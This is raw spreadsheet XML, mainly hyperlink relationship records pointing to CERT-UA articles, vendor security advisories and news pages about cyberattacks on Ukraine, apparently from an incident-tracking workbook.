    <xf borderId="0" fillId="0" fontId="1" numFmtId="4" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="49" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="0" fillId="2" fontId="8" numFmtId="164" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="164" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="4" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="16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cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tridiuma.ru/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tridiuma.ru/scaffold.php" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forbes.com/sites/carlieporterfield/2022/04/22/ukraine-postal-service-hit-with-cyberattack-after-selling-viral-anti-russia-stamps/?sh=1b42d0635e60" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10702" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://loda.gov.ua/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/rosiiski-khakeri-zdiisnili-masshtabnu-ddos-ataku-na-saiti-ukrayinskikh-telekom-operatoriv" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/derzhavnii-centr-kiberzakhistu-derzhspeczv-yazku-neitralizuvav-ataku-na-saiti-derzhavnikh-organiv" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/rosiiski-khakeri-atakuyut-informaciini-sistemi-po-vsii-krayini-adzhe-meta-rosiyi-zavoyuvati-vsyu-ukrayinu-a-ne-tilki-yiyi-skhid" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18273" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18365" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18101" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18163" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/14624" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/17961" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/13156" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37788" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37688" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37704" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37287" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37626" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37246" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37287" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40240" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37139" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18419" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38606" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39138" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38155" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38374" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38088" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38097" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37815" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37829" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40125" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40102" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kb.cert.org/vuls/id/383432" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kb.cert.org/vuls/id/383432" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://misp.cert.gov.ua/events/view/1613" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.paloaltonetworks.com/CVE-2021-3064..." TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://logging.apache.org/log4j/2.x/download.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39934" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39923" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39882" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39708" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39253" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/.../cisco-sa-cisco-jabber..." TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/.../cisco-sa-cisco-jabber..." TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39609" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39606" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39518" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/.../cisco-sa-cisco-jabber..." TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39386" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drupal.org/sa-core-2021-011" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/.../cisco-sa-cisco-jabber..." TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/.../cisco-sa-cisco-jabber..." TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/3028" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mil.gov.ua/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla.org/.../security/advisories/mfsa2022-09/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla.org/.../security/advisories/mfsa2022-09/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla.org/.../security/advisories/mfsa2022-09/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/story.php?story_fbid=317263187099613&amp;id=100064478028712" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tanzu.vmware.com/security/cve-2022-22963" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tanzu.vmware.com/security/cve-2022-22963" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tanzu.vmware.com/security/cve-2022-22963" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mozilla.org/.../security/advisories/mfsa2022-09/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011." TargetMode="External"/><Relationship Id="rId15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www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39606" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39518" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39386" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39609" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39708" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/derzhavnii-centr-kiberzakhistu-derzhspeczv-yazku-neitralizuvav-ataku-na-saiti-derzhavnikh-organiv" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39138" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39253" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/13156" 